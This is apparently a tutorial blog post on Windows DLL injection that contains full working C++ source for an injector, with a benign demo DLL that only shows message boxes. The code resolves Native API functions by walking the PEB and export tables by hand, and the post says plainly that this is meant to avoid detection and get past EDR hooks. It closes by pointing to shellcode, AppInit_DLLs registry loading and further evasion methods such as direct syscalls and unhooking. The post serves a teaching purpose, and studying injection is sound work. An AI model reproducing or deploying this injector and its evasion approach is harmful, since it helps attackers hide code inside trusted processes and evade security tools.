What is DLL Injection

DLL injection is a programming technique that allows code, contained within a Dynamic Link Library (DLL), to be loaded and executed inside the address space of another process. This means the injected DLL can run with the same permissions and context as the target application.

Why inject?

Placing code into another process, often referred to as process injection, can be used for both good and bad purposes. The difference lies in why it is being done and who is doing it.

On the legitimate side, many antivirus programs, security tools, and monitoring tools rely on code injection techniques to keep your system safe. For example, a security product might inject a small piece of code into every running application so it can watch what each program is doing in real time. This allows it to intercept important actions, a practice known as hooking, such as when a program tries to create a new process, access sensitive data, or read or write a file, so the security tool can inspect and monitor that activity.

The reason they place hooks inside each process, across several DLLs, instead of hooking a single DLL like ntdll.dll is that malicious behavior doesn’t always go through one predictable path. If they only hooked NTDLL, attackers could bypass detection by:

Manually mapping an unhooked version of NTDLL.
Making raw syscalls directly without using NTDLL.
Using higher-level APIs in other DLLs (kernel32.dll, user32.dll, etc.) that internally trigger the same system calls.
Executing malicious logic entirely in user-mode before the syscall happens.

By injecting into each process, the security tool gains:

Full visibility into all API calls at multiple levels (user-mode and syscall level).
Context, such as the call stack, loaded modules, and memory contents when an action occurs.
Protection against hook removal, because hooks are spread across multiple DLLs in every process.
Detection of in-memory threats, like shellcode in RWX memory regions that never touch disk.

Take file access as an example. In normal use, a word processor like Microsoft Word mainly reads and writes document files. If security software detects that Word is suddenly trying to access system password files or make changes to the Windows registry, that’s unusual behavior. It could indicate that a malicious macro or exploit is running inside the program. In this situation, the injected monitoring code acts like a silent security guard, positioned inside the application to watch every move and stop anything suspicious before it causes harm.

Of course, the very same mechanism can be abused by attackers. Malicious actors can inject their own code into trusted programs to hide their activity, steal data, or execute harmful commands, often without being detected. This dual nature is why DLL injection is considered both a powerful development tool and a potential security threat.

How does it work?

On Windows, user-mode processes are isolated from one another: each process has its own private memory space that other processes normally can’t access. This isolation is a core security feature, preventing programs from tampering with each other’s memory directly.

Every process executes code through threads, and a process needs at least one running thread to do anything.

When you want to inject code or a DLL into another process, the problem is twofold:

Placing the code into the target process’s memory
Getting the target process to execute that code

The simplest and most common method uses Windows API functions:

OpenProcess – Get a handle to the target process with the required permissions.
VirtualAllocEx – Allocate memory inside the target process’s address space for your code or data.
WriteProcessMemory – Write the code (or DLL path) into that allocated memory.
(Optional) ReadProcessMemory – Read from the target process’s memory if needed.
CreateRemoteThread – Start a new thread in the target process that begins execution at your injected code’s address.

This sequence is the classic approach to process injection. There are more advanced methods (like APC injection, thread hijacking, or reflective DLL loading), but this one is the most straightforward and widely used. In our example on GitHub, we will use undocumented Native API functions from ntdll.dll instead, to avoid detection.

Create payload

In this step, you can inject shellcode or a DLL, but in our example, we will create a DLL that will be loaded into the target process. First, to create a custom DLL, read the official Windows documentation.

In our example, the DLL code simply shows a message box with different messages depending on the callback.

When the DLL is loaded into a process (DLL_PROCESS_ATTACH), it shows a message box saying "Malicious DLL Attached and Executed" to indicate that the DLL is now active.
When the DLL is unloaded from the process (DLL_PROCESS_DETACH), it shows a message box saying "Malicious DLL Detached!", signaling that the DLL is being removed.
When a new thread starts in the process (DLL_THREAD_ATTACH), it shows a message box saying "Thread Created!", indicating that a thread was created while the DLL is loaded.
When a thread exits (DLL_THREAD_DETACH), it shows a message box saying "Thread Terminated".

custom_dll.cpp

#include "pch.h"
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(NULL, "Malicious DLL Attached and Executed", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(NULL, "Malicious DLL Detached!", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_THREAD_ATTACH:
        MessageBoxA(NULL, "Thread Created!", "WARNING", MB_ICONEXCLAMATION);
        break;
    case DLL_THREAD_DETACH:
        MessageBoxA(NULL, "Thread Terminated", "WARNING", MB_ICONEXCLAMATION);
        break;
    }
    return TRUE;
}

Code

In our example on GitHub, we use undocumented functions. First, we need a function that reimplements GetModuleHandle by hand, so that we can use it without GetModuleHandle showing up in the Import Address Table (IAT). Also, some EDRs hook kernel32.dll; resolving functions dynamically lets you get function pointers from ntdll.dll directly, or even resolve syscalls, bypassing those hooks. The function does the following:

The code gets the PEB (Process Environment Block) from the segment register (GS on x64, FS on x86). The PEB contains info about all loaded modules.
It goes through the linked list of loaded modules in peb->Ldr->InMemoryOrderModuleList.
For each module, it converts the wide-char DLL name to ANSI, makes it lowercase, and checks if it contains the given moduleName. If found, it returns the module’s base address.

If no match is found, it returns NULL.
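
The list walk in these steps rests on two ideas: the list is circular with a sentinel head, and each link is embedded inside a larger record, so the record's address is recovered by subtracting the link's offset. Here is a minimal portable sketch of that pattern. The types and functions (`ListEntry`, `ModuleRecord`, `RecordFromLink`, `Append`, `FindBase`) are hypothetical stand-ins for illustration, not the real Windows structures:

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical stand-in for LIST_ENTRY: a node in a circular doubly-linked list.
struct ListEntry {
    ListEntry* Flink;  // forward link
    ListEntry* Blink;  // backward link
};

// Hypothetical stand-in for LDR_DATA_TABLE_ENTRY. The link is deliberately
// not the first member, so its address differs from the record's address.
struct ModuleRecord {
    std::uintptr_t base;
    ListEntry links;
    const char* name;
};

// Same idea as CONTAINING_RECORD: subtract the member's offset from its address.
inline ModuleRecord* RecordFromLink(ListEntry* link) {
    return reinterpret_cast<ModuleRecord*>(
        reinterpret_cast<char*>(link) - offsetof(ModuleRecord, links));
}

// Insert a record just before the sentinel head, i.e. at the tail of the list.
inline void Append(ListEntry* head, ModuleRecord* rec) {
    rec->links.Flink = head;
    rec->links.Blink = head->Blink;
    head->Blink->Flink = &rec->links;
    head->Blink = &rec->links;
}

// Walk from head->Flink until we arrive back at the sentinel.
inline std::uintptr_t FindBase(ListEntry* head, const char* name) {
    for (ListEntry* cur = head->Flink; cur != head; cur = cur->Flink) {
        ModuleRecord* rec = RecordFromLink(cur);
        if (std::strcmp(rec->name, name) == 0) {
            return rec->base;
        }
    }
    return 0;  // not found
}
```

An empty list is a head whose Flink and Blink both point at itself, which is why the loop condition `cur != head` also handles the no-modules case.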

ManualGetModuleHandle.cpp

// This function manually replicates the behavior of the standard `GetModuleHandle` API call.
// It finds the base address of a loaded DLL (module) in the current process by its name.
// It does this by directly accessing the Process Environment Block (PEB).
HMODULE ManualGetModuleHandle(LPCSTR moduleName) {
	// The PEB (Process Environment Block) is a data structure that holds information about a process.
	// Its location in memory is fixed relative to a segment register.
#ifdef _WIN64
	// On 64-bit Windows, a pointer to the PEB is stored at offset 0x60 from the GS segment register.
	// `__readgsqword` is a compiler intrinsic that reads a 64-bit value directly from this location.
	PPEB peb = (PPEB)__readgsqword(0x60);
#else
	// On 32-bit Windows, the pointer is at offset 0x30 from the FS segment register.
	PPEB peb = (PPEB)__readfsdword(0x30);
#endif

	// Basic sanity check. If we can't get the PEB or its Ldr member, we can't proceed.
	if (!peb || !peb->Ldr) return NULL;

	// The PEB's Ldr member points to a PEB_LDR_DATA structure, which contains information about loaded modules.
	// `InMemoryOrderModuleList` is a doubly-linked list of all modules loaded by the process.
	// A linked list is a data structure where each element (node) points to the next one.

	// `head` points to the sentinel node of the list. This node itself doesn't represent a module.
	LIST_ENTRY* head = &peb->Ldr->InMemoryOrderModuleList;
	// `current` is initialized to point to the first actual module in the list.
	LIST_ENTRY* current = head->Flink;

	// We iterate through the linked list. The list is circular, meaning the last element's `Flink`
	// (forward link) points back to the head. When `current` equals `head`, we've looped through the entire list.
	while (current != head) {
		// `CONTAINING_RECORD` is a clever macro. `current` is a pointer to the `InMemoryOrderLinks` field
		// inside a `LDR_DATA_TABLE_ENTRY` struct. This macro calculates the starting address of the
		// parent `LDR_DATA_TABLE_ENTRY` struct from the address of its member field.
		PLDR_DATA_TABLE_ENTRY entry = CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

		// Check if the DLL name is valid before trying to read it.
		if (entry->FullDllName.Buffer) {
			// Create a buffer to hold the module name as a standard C-style string (char array).
			char name[MAX_PATH] = { 0 }; // Initialize with zeros.

			// The `FullDllName.Buffer` stores the name as a wide-character string (UTF-16).
			// We need to convert it to a multi-byte (ANSI) string to compare it with `moduleName`.
			WideCharToMultiByte(
				CP_ACP,                             // Code Page: Use the system's default ANSI code page.
				0,                                  // Flags: 0 for default behavior.
				entry->FullDllName.Buffer,          // Input: The wide-character string to convert.
				entry->FullDllName.Length / sizeof(WCHAR), // Input: The length of the string in characters.
				name,                               // Output: The buffer to store the converted ANSI string.
				sizeof(name) - 1,                   // Output: The size of the output buffer.
				NULL,                               // Default Char: Use system default if a character can't be converted.
				NULL                                // Used Default Char: We don't need to know if a default was used.
			);

			// To make the comparison case-insensitive (e.g., "ntdll.dll" matches "NTDLL.DLL"),
			// we convert the extracted name to lowercase. `_strlwr_s` is a safe version of `_strlwr`.
			_strlwr_s(name, sizeof(name));

			// `strstr` checks if the `moduleName` we're looking for is a substring of the module's full path.
			// This is a simple way to match "ntdll.dll" against "C:\Windows\System32\ntdll.dll".
			// Note that `moduleName` itself is not lowercased here, so callers must pass it in lowercase.
			if (strstr(name, moduleName)) {
				// If we find a match, we return the base address of the DLL (`DllBase`).
				// This is the `HMODULE` we were looking for.
				return (HMODULE)entry->DllBase;
			}
		}
		// Move to the next module in the linked list.
		current = current->Flink;
	}

	// If the loop finishes without finding the module, we return NULL.
	return NULL;
}
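
One caveat of the `strstr` match used above is that it accepts any path that merely contains the name, so "ntdll.dll" would also match a path ending in "fake_ntdll.dll". A stricter variant compares only the final path component, ignoring case. The sketch below is a portable illustration of that comparison; `BaseNameEquals` is a hypothetical helper, not part of the original code:

```cpp
#include <cctype>
#include <cstddef>
#include <string>

// Returns true when the last path component of `fullPath` equals `moduleName`,
// ignoring ASCII case. Both '\\' and '/' are treated as path separators.
inline bool BaseNameEquals(const std::string& fullPath, const std::string& moduleName) {
    const std::size_t sep = fullPath.find_last_of("\\/");
    const std::string base =
        (sep == std::string::npos) ? fullPath : fullPath.substr(sep + 1);

    if (base.size() != moduleName.size()) {
        return false;
    }
    for (std::size_t i = 0; i < base.size(); ++i) {
        const auto a = static_cast<unsigned char>(base[i]);
        const auto b = static_cast<unsigned char>(moduleName[i]);
        if (std::tolower(a) != std::tolower(b)) {
            return false;
        }
    }
    return true;
}
```

Because both sides are lowercased during the comparison, the caller no longer has to remember to pass the module name in lowercase.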

After ManualGetModuleHandle, which gives us a handle to a module, we need a function that takes a module handle and a function name, parses the module's PE headers, searches the export table for the function we want, and returns the address of that function.

Check PE headers → Make sure the DLL at hModule is valid (MZ DOS header + PE NT header).

Find Export Directory → Use the PE header’s data directory to locate where the list of exported functions is stored.

Read Export Tables:

AddressOfNames → RVAs of the exported function names.
AddressOfFunctions → RVAs (Relative Virtual Addresses) of the function code.
AddressOfNameOrdinals → Links names to function addresses.

Search for the target function name.
Return its absolute address (base address + RVA).
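
The relationship between the three tables is easier to see with plain arrays. The following is a simplified, portable sketch: `ExportTables`, `LookupRva`, and `AbsoluteAddress` are hypothetical names, the values are made up, and names are stored as ordinary pointers rather than RVAs to keep the example self-contained.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical, simplified view of an export directory.
struct ExportTables {
    std::vector<const char*> names;           // parallel to nameOrdinals
    std::vector<std::uint16_t> nameOrdinals;  // index into `functions` for names[i]
    std::vector<std::uint32_t> functions;     // RVAs of the exported code
};

// Returns the RVA exported under `wanted`, or 0 when the name is not present.
inline std::uint32_t LookupRva(const ExportTables& t, const char* wanted) {
    for (std::size_t i = 0; i < t.names.size() && i < t.nameOrdinals.size(); ++i) {
        if (std::strcmp(t.names[i], wanted) == 0) {
            const std::uint16_t index = t.nameOrdinals[i];
            if (index >= t.functions.size()) {
                return 0;  // malformed table: index out of range
            }
            return t.functions[index];
        }
    }
    return 0;
}

// An RVA becomes an absolute address by adding the module's base address.
inline std::uint64_t AbsoluteAddress(std::uint64_t base, std::uint32_t rva) {
    return base + rva;
}
```

Note that the position of a name in the names table is not the position of its code in the functions table; the ordinals table is the indirection that connects the two.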

ManualGetProcAddress.cpp

// This function manually replicates the behavior of the standard `GetProcAddress` API call.
// It finds the memory address of an exported function within a loaded module (DLL).
// It works by parsing the PE (Portable Executable) file format of the DLL directly in memory.
FARPROC ManualGetProcAddress(HMODULE hModule, LPCSTR functionName) {
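	// A NULL module handle (for example, when the module was not found) cannot be parsed.
	if (!hModule) {
		return NULL;
	}

	// The `hModule` is the base address of the DLL in memory. We cast it to a pointer to an
	// `IMAGE_DOS_HEADER`. This header is at the very beginning of every PE file.
	IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)hModule;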
	// The `e_magic` field should be "MZ" (0x5A4D), which is the signature for a DOS header.
	// This is a sanity check to ensure we're looking at a valid PE file.
	if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return NULL;
	}

	// The DOS header contains an offset, `e_lfanew`, which points to the NT headers.
	// We calculate the address of the NT headers by adding this offset to the module's base address.
	IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)hModule + dosHeader->e_lfanew);
	// The NT headers also have a signature, which should be "PE\0\0" (0x00004550).
	if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return NULL;
	}

	// The NT headers contain an `OptionalHeader`, which in turn has a `DataDirectory`.
	// The `DataDirectory` is an array of entries pointing to important parts of the PE file.
	// We want the entry for the export directory (`IMAGE_DIRECTORY_ENTRY_EXPORT`).
	IMAGE_DATA_DIRECTORY* exportDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
	// If the virtual address or size is zero, it means this module doesn't export any functions.
	if (exportDir->VirtualAddress == 0 || exportDir->Size == 0) {
		return NULL;
	}

	// The `VirtualAddress` is an RVA (Relative Virtual Address), an offset from the module's base address.
	// We calculate the actual memory address of the export directory.
	IMAGE_EXPORT_DIRECTORY* exports = (IMAGE_EXPORT_DIRECTORY*)((BYTE*)hModule + exportDir->VirtualAddress);

	// Now we get the addresses of the three important tables in the export directory:
	// 1. AddressOfFunctions: An array of RVAs to the exported functions' code.
	// 2. AddressOfNames: An array of RVAs to the names of the exported functions.
	// 3. AddressOfNameOrdinals: An array of indices that links the names table to the functions table.
	DWORD* functions = (DWORD*)((BYTE*)hModule + exports->AddressOfFunctions);
	DWORD* names = (DWORD*)((BYTE*)hModule + exports->AddressOfNames);
	WORD* ordinals = (WORD*)((BYTE*)hModule + exports->AddressOfNameOrdinals);

	// We loop through all the exported function names.
	for (DWORD i = 0; i < exports->NumberOfNames; i++) {
		// Get the RVA of the current function name and calculate its actual address in memory.
		char* name = (char*)((BYTE*)hModule + names[i]);
		// Compare the current function name with the one we're looking for.
		if (strcmp(name, functionName) == 0) {
			// If we find a match, we've found our function.
			// `ordinals[i]` gives us the index into the `functions` array for this named function.
			// `functions[ordinals[i]]` gives us the RVA of the function's code.
			// We add this RVA to the module's base address to get the final, absolute memory address.
			return (FARPROC)((BYTE*)hModule + functions[ordinals[i]]);
		}
	}

	// If the loop finishes without finding the function, we return NULL.
	return NULL; // Function not found
}
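
One case the function above does not handle is forwarded exports. In the PE format, when an RVA read from AddressOfFunctions falls inside the export directory itself, it does not point to code but to a forwarder string naming another module and function (such as "NTDLL.RtlAllocateHeap"). A minimal sketch of that range check follows; `IsForwarderRva` is a hypothetical helper name:

```cpp
#include <cstdint>

// True when `functionRva` lies inside [exportDirRva, exportDirRva + exportDirSize),
// which the PE format uses to mark a forwarded export.
inline bool IsForwarderRva(std::uint32_t functionRva,
                           std::uint32_t exportDirRva,
                           std::uint32_t exportDirSize) {
    // 64-bit arithmetic so that exportDirRva + exportDirSize cannot wrap around.
    const std::uint64_t end =
        static_cast<std::uint64_t>(exportDirRva) + exportDirSize;
    return functionRva >= exportDirRva && functionRva < end;
}
```

In ManualGetProcAddress, the inputs would be `functions[ordinals[i]]`, `exportDir->VirtualAddress`, and `exportDir->Size`. Returning the forwarder address as if it were code would hand the caller a pointer into string data, so a resolver should at least detect this case and return NULL.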

After all that, the main function needs the target PID and the path of the DLL that will be injected into the target process. The main function does the following:

Check input arguments
The program expects exactly 2 arguments:

Target process ID (PID)
Full path to the DLL file to inject
If arguments are missing or incorrect, it prints usage instructions and exits.

Parse inputs

Convert the PID argument from string to DWORD.
Store the DLL path string.

Open target process handle

Use ManualGetModuleHandle and ManualGetProcAddress to get the address of NtOpenProcess from ntdll.dll.
Prepare required structures (CLIENT_ID, OBJECT_ATTRIBUTES) with the PID.
Call NtOpenProcess with permissions to create threads and manipulate process memory.
If it fails, print error and exit; otherwise keep the process handle.

Allocate memory in target process

Get address of NtAllocateVirtualMemory from ntdll.dll using the manual method.
Allocate memory in the remote process sized to hold the DLL path string.
If allocation fails, print error and exit.

Write DLL path to allocated memory

Get address of NtWriteVirtualMemory.
Write the DLL path string into the remote process’s allocated memory.
If writing fails, print error and exit.

Get address of LoadLibraryA

Use manual method to find LoadLibraryA in kernel32.dll.
LoadLibraryA will be called remotely to load the DLL into the target process.

Create remote thread

Get address of NtCreateThreadEx in ntdll.dll.
Create a remote thread in the target process that starts by running LoadLibraryA, passing the address of the DLL path in the target process memory.
This causes the target process to load the DLL.
If thread creation fails, print error and exit.

Cleanup and finish

Close handles for the created thread and process.
Print success messages and exit.
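
For the "Parse inputs" step, note that `strtoul` on its own returns 0 for non-numeric input and silently ignores trailing characters, so an argument like "abc" or "12ab" would still yield a PID. A stricter parse might look like the sketch below; `ParsePid` is a hypothetical helper, and rejecting PID 0 is an assumption made here because it is not a useful target.

```cpp
#include <cctype>
#include <cerrno>
#include <cstdint>
#include <cstdlib>
#include <limits>

// Parses a decimal PID. Returns false for empty, signed, non-numeric,
// partially numeric, out-of-range, or zero input.
inline bool ParsePid(const char* text, std::uint32_t& pidOut) {
    // Require the first character to be a digit; this also rejects
    // leading whitespace and '+'/'-' signs, which strtoul would accept.
    if (text == nullptr || !std::isdigit(static_cast<unsigned char>(*text))) {
        return false;
    }

    errno = 0;
    char* end = nullptr;
    const unsigned long value = std::strtoul(text, &end, 10);

    if (errno == ERANGE || *end != '\0') {
        return false;  // overflow, or trailing characters after the number
    }
    if (value == 0 || value > std::numeric_limits<std::uint32_t>::max()) {
        return false;
    }

    pidOut = static_cast<std::uint32_t>(value);
    return true;
}
```

In main, a failed parse would be handled the same way as a wrong argument count: print the usage text and exit.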

main.cpp

// The main entry point of the program.
int main(int argc, char* argv[]) {

	if (argc != 3) {
		cerr << "Usage:\n";
		cerr << "\tDLL_injector.exe <PID> <PathToDLL>\n";
		cerr << "Example:\n";
		cerr << "\tDLL_injector.exe 19692 \"C:\\Users\\mohe_2004\\Desktop\\some code\\custom_dll\\x64\\Release\\custom_dll.dll\"\n";

		return 1;
	}


	// The Process ID (PID) of the target process we want to inject our DLL into,
	// taken from the first command-line argument.
	// You can find PIDs using Task Manager.
	DWORD pid = static_cast<DWORD>(strtoul(argv[1], nullptr, 10));
	// The full, absolute path to the DLL file that we want to inject.
	const char* dllPath = argv[2];

	// --- Step 1: Get a handle to the target process ---
	cout << "[+] Opening target process with PID: " << pid << "\n";

	// Instead of calling `GetProcAddress`, we use our manual implementation to find `NtOpenProcess`.
	// We first get a handle to `ntdll.dll` and then find the function's address within it.
	pNtOpenProcess NtOpenProcess = (pNtOpenProcess)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"), // Find ntdll.dll's base address
		"NtOpenProcess"                     // Find the function's address inside it
	);
	if (!NtOpenProcess) {
		cerr << "[-] Failed to resolve NtOpenProcess\n";
		return 1;
	}

	HANDLE hprocess = NULL; // This will store the handle to the target process.
	CLIENT_ID cid = { 0 };  // A structure required by NtOpenProcess to identify the target.
	cid.UniqueProcess = (HANDLE)pid; // We specify the target by its Process ID.
	cid.UniqueThread = NULL;         // Not used when opening a process.

	OBJECT_ATTRIBUTES objAttr; // Another structure required by many Native API functions.
	// `InitializeObjectAttributes` is a macro that fills in the structure's fields for us.
	// We don't need any special attributes, so we pass NULLs.
	InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);

	// Call the `NtOpenProcess` function we found earlier.
	NTSTATUS status = NtOpenProcess(
		&hprocess,							// Output: The handle will be stored here.
		PROCESS_CREATE_THREAD |				// Permissions: We need permission to create a thread.
		PROCESS_QUERY_INFORMATION |			// To query process info (often needed).
		PROCESS_VM_OPERATION |				// To perform memory operations like allocation.
		PROCESS_VM_WRITE |					// To write into the process's memory.
		PROCESS_VM_READ,					// To read from the process's memory.
		&objAttr,							// Input: The initialized object attributes.
		&cid								// Input: The client ID specifying the target PID.
	);

	// `NTSTATUS` is a type used by Native API functions. A value of 0 means success.
	// Any other value indicates an error.
	if (status != 0) {
		cerr << "[-] NtOpenProcess failed with status: 0x" << std::hex << status << std::endl;
		return 1; // Exit the program with an error code.
	}
	cout << "[+] Opened process handle: " << hprocess << "\n";

	// --- Step 2: Allocate memory in the target process for the DLL path ---

	// Get the address of `NtAllocateVirtualMemory` from `ntdll.dll`.
	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtAllocateVirtualMemory"
	);
	if (!NtAllocateVirtualMemory) {
		cerr << "[-] Failed to resolve NtAllocateVirtualMemory\n";
		return 1;
	}

	cout << "[+] Allocating memory in remote process...\n";

	PVOID baseAddress = nullptr; // This will store the address of the memory we allocate.
	// The size of memory we need is the length of the DLL path string, plus one byte for the null terminator.
	SIZE_T size = strlen(dllPath) + 1;

	// Call the allocation function.
	NTSTATUS statusAllocation = NtAllocateVirtualMemory(
		hprocess,                // Handle to the target process.
		&baseAddress,            // Output: Receives the address of the allocated memory.
		0,                       // ZeroBits: Must be 0.
		&size,                   // Input/Output: The size of memory to allocate.
		MEM_COMMIT | MEM_RESERVE, // Allocation Type: Reserve and commit the memory in one step.
		PAGE_READWRITE           // Protection: We need to be able to read and write to this memory.
	);

	if (statusAllocation != 0) {
		cerr << "[-] NtAllocateVirtualMemory failed with NTSTATUS: 0x" << hex << statusAllocation << endl;
		return 1;
	}
	cout << "[+] Memory allocated at address: " << baseAddress << endl;

	// --- Step 3: Write the DLL path into the allocated memory ---
	cout << "[+] Writing DLL path into allocated memory...\n";

	// Get the address of `NtWriteVirtualMemory` from `ntdll.dll`.
	pNtWriteVirtualMemory _NtWriteVirtualMemory = (pNtWriteVirtualMemory)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtWriteVirtualMemory"
	);
	if (!_NtWriteVirtualMemory) {
		cerr << "[-] Failed to resolve NtWriteVirtualMemory\n";
		return 1;
	}

	SIZE_T bytesWritten = 0; // This will store the number of bytes that were actually written.
	// Call the write function.
	NTSTATUS statusWrite = _NtWriteVirtualMemory(
		hprocess,              // Handle to the target process.
		baseAddress,           // The address in the target process where we want to write.
		(PVOID)dllPath,        // A pointer to our local buffer containing the DLL path.
		(ULONG)(strlen(dllPath) + 1), // The number of bytes to write.
		&bytesWritten          // Output: Receives the number of bytes written.
	);

	if (statusWrite != 0) {
		// Native API calls report failure through the returned NTSTATUS, not GetLastError().
		cerr << "[-] Failed to write to memory at address: " << baseAddress
			<< ". NTSTATUS: 0x" << hex << statusWrite << "\n";
		return 1;
	}
	cout << "[+] Wrote DLL path to remote process memory. Wrote: " << bytesWritten << "\n";

	// --- Step 4: Get the address of the `LoadLibraryA` function ---
	// `LoadLibraryA` is the function that can load a DLL into a process. It's located in `kernel32.dll`.
	// The plan is to create a remote thread that starts by executing `LoadLibraryA`, and we will give it
	// the address of our DLL path (which we just wrote into the target's memory) as its argument.
	FARPROC LoadLibraryAddress = ManualGetProcAddress(
		ManualGetModuleHandle("kernel32.dll"), // Find kernel32.dll
		"LoadLibraryA"                         // Find the address of LoadLibraryA
	);
	if (!LoadLibraryAddress) {
		// Our manual resolver does not set the thread's last-error value, so there is no code to print.
		cerr << "[-] Failed to get address of LoadLibraryA\n";
		return 1;
	}
	cout << "[+] Got LoadLibraryA address: " << LoadLibraryAddress << "\n";

	// --- Step 5: Create a remote thread to execute `LoadLibraryA` ---
	cout << "[+] Creating remote thread in target process...\n";

	// Get the address of `NtCreateThreadEx` from `ntdll.dll`.
	pNtCreateThreadEx _NtCreateThreadEx = (pNtCreateThreadEx)ManualGetProcAddress(
		ManualGetModuleHandle("ntdll.dll"),
		"NtCreateThreadEx"
	);
	if (!_NtCreateThreadEx) {
		cerr << "[-] Failed to resolve NtCreateThreadEx\n";
		return 1;
	}

	HANDLE thread = nullptr; // This will receive the handle of the newly created thread.

	// Call the thread creation function.
	NTSTATUS statusThreadCreation = _NtCreateThreadEx(
		&thread,                             // Output: Receives the new thread handle.
		0x1FFFFF,                            // Access Mask: A common value for "all access".
		NULL,                                // Object Attributes: Use defaults.
		hprocess,                            // Target Process Handle: The process to create the thread in.
		LoadLibraryAddress,                  // Start Routine: The function the new thread will execute.
		baseAddress,                         // Argument: The argument passed to the start routine (our DLL path).
		FALSE,                               // Create Flags: 0 or FALSE means the thread runs immediately.
		0,                                   // ZeroBits: Not used.
		0,                                   // StackSize: 0 for default size.
		0,                                   // MaximumStackSize: 0 for default size.
		NULL                                 // AttributeList: Not used.
	);

	// Check if the thread was created successfully.
	if (statusThreadCreation != 0 || !thread) {
		cerr << "[-] Failed to create remote thread. NTSTATUS: 0x" << hex << statusThreadCreation << std::endl;
		return 1;
	}

	cout << "[+] Successfully created remote thread: " << thread << "\n";
	cout << "[+] DLL injection should be complete!" << endl;

	// The program successfully completed its task.
	CloseHandle(thread);
	CloseHandle(hprocess);

	return 0;
}
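
The status checks in main.cpp treat any nonzero NTSTATUS as a failure. The Windows headers take a slightly different view: the `NT_SUCCESS` macro tests whether the value is non-negative as a signed 32-bit integer, so success and informational codes pass while warning and error codes fail. The top two bits of the value encode that severity. A portable sketch of the same logic, using stand-in names (`NtStatus`, `NtSuccess`, `Severity`) rather than the real Windows types:

```cpp
#include <cstdint>

// Stand-in for the Windows NTSTATUS type, which is a signed 32-bit integer.
using NtStatus = std::int32_t;

// Mirrors the logic of NT_SUCCESS: any non-negative value counts as success.
constexpr bool NtSuccess(NtStatus status) {
    return status >= 0;
}

// The top two bits hold the severity:
// 0 = success, 1 = informational, 2 = warning, 3 = error.
constexpr unsigned Severity(NtStatus status) {
    return static_cast<std::uint32_t>(status) >> 30;
}
```

For the calls used here the two checks agree in practice, but `NtSuccess`-style testing is the convention most Native API code follows.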

Demo

Let's test the code by targeting notepad.exe.

If everything is fine, the first callback triggered in the DLL should be DLL_PROCESS_ATTACH, which simply shows a message like the following:

Next, let's try to trigger DLL_THREAD_ATTACH. This callback runs when the process spawns a new thread, so opening a new tab in Notepad should trigger it.

You get the idea: for each of these events, the DLL shows a message. You can change the DLL code to make it run any code you want, or you can run shellcode instead of the DLL.

Other ways

There are many ways to perform DLL injection. For example, instead of using LoadLibrary, we can manually map the DLL into the target process’s memory. This approach is known as manual mapping and is closely related to reflective DLL injection, where the DLL carries its own loader. Another method is using LoadLibrary combined with QueueUserAPC, which injects a DLL without creating new threads in the target process.

Windows also provides some built-in methods for DLL injection that are used for various legitimate purposes. One simple way is through specific registry values:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

On 64-bit systems, there are separate registry values for 32-bit applications:

HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs

By adding a DLL filename to the AppInit_DLLs value, that DLL will automatically be loaded into every process that loads User32.dll, which includes most Windows applications. This only works if the LoadAppInit_DLLs value is set to 0x00000001. On Windows 8 and later, AppInit_DLLs is also disabled when Secure Boot is enabled.
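
When auditing a machine for this mechanism, it helps to split the AppInit_DLLs value into its individual entries. Microsoft documents the value as a list delimited by spaces or commas. The sketch below assumes the string has already been read from the registry and only shows the splitting; `SplitAppInitDlls` is a hypothetical helper name.

```cpp
#include <string>
#include <vector>

// Splits an AppInit_DLLs-style string on spaces and commas,
// skipping empty entries produced by repeated delimiters.
inline std::vector<std::string> SplitAppInitDlls(const std::string& value) {
    std::vector<std::string> entries;
    std::string current;

    for (const char c : value) {
        if (c == ' ' || c == ',') {
            if (!current.empty()) {
                entries.push_back(current);
                current.clear();
            }
        } else {
            current.push_back(c);
        }
    }
    if (!current.empty()) {
        entries.push_back(current);
    }
    return entries;
}
```

Because a space is a delimiter, a path containing spaces would be split into several entries, so any entry that looks like a path fragment deserves a closer look.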

Final thoughts

DLL injection can be achieved through various techniques depending on the use case and level of stealth required. Methods like LoadLibrary-based injection and reflective DLL injection are the most widely used, but there are also advanced approaches such as unhooking, direct syscalls, indirect syscalls, API hashing, and others that offer greater evasion from detection and hooking by security software.